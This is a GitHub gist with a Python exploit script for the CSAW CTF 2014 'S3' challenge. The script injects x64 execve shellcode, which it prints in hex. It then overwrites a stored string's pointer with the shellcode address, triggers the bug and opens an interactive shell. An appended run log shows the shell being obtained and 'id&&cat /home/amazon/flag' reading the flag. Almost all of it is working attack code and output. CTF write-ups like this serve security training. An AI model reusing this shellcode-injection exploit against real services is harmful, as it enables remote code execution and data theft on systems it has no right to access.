Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CSAW CTF 2014 - s3 exploit
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#s3 exploit
s = NullSocket("54.165.225.121", 5333)
s.readuntil("> ")
print '[!] Setting shellcode'
shellcode = NullShell('exec', arch='x64-86').get()
print 'Shellcode: ' + shellcode.encode('hex')
s.writeline("c 1 " + shellcode)
s.readuntil("unique identifier is: ")
addr_shellcode = int(s.readline()[:-1])
s.readuntil("> ")
print '[+] Shellcode address: 0x%08X' % addr_shellcode
print '[!] Setting new counter string'
s.writeline("c 1 AAAA")
s.readuntil("unique identifier is: ")
id = int(s.readline()[:-1])
print '[!] id new string: %d' % id
s.readuntil("> ")
print '[!] Updating counter string id: %d' % id
s.writeline("u %d %s" % (id, struct.pack("<Q", addr_shellcode)))
s.readuntil("unique identifier is: ")
id = int(s.readline()[:-1])
print '[!] id new string: %d' % id
s.readuntil("> ")
print '[!] Trigger vuln'
s.writeline("r %d" % id)
print '[***] Got shell'
s.interactive()
'''
$ python s3.py
[!] Setting shellcode
Shellcode: 4831c048bbd19d9691d08c97ff48f7db53545f50505e5ab03b0f05
[+] Shellcode address: 0x01A27030
[!] Setting new counter string
[!] id new string: 27422992
[!] Updating counter string id: 27422992
[!] id new string: 27422848
[!] Trigger vuln
[***] Got shell
id&&cat /home/amazon/flag
uid=1001(amazon) gid=1001(amazon) groups=1001(amazon)
flag{SimplyStupidStorage}
exit
*** Connection closed by remote host ***
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.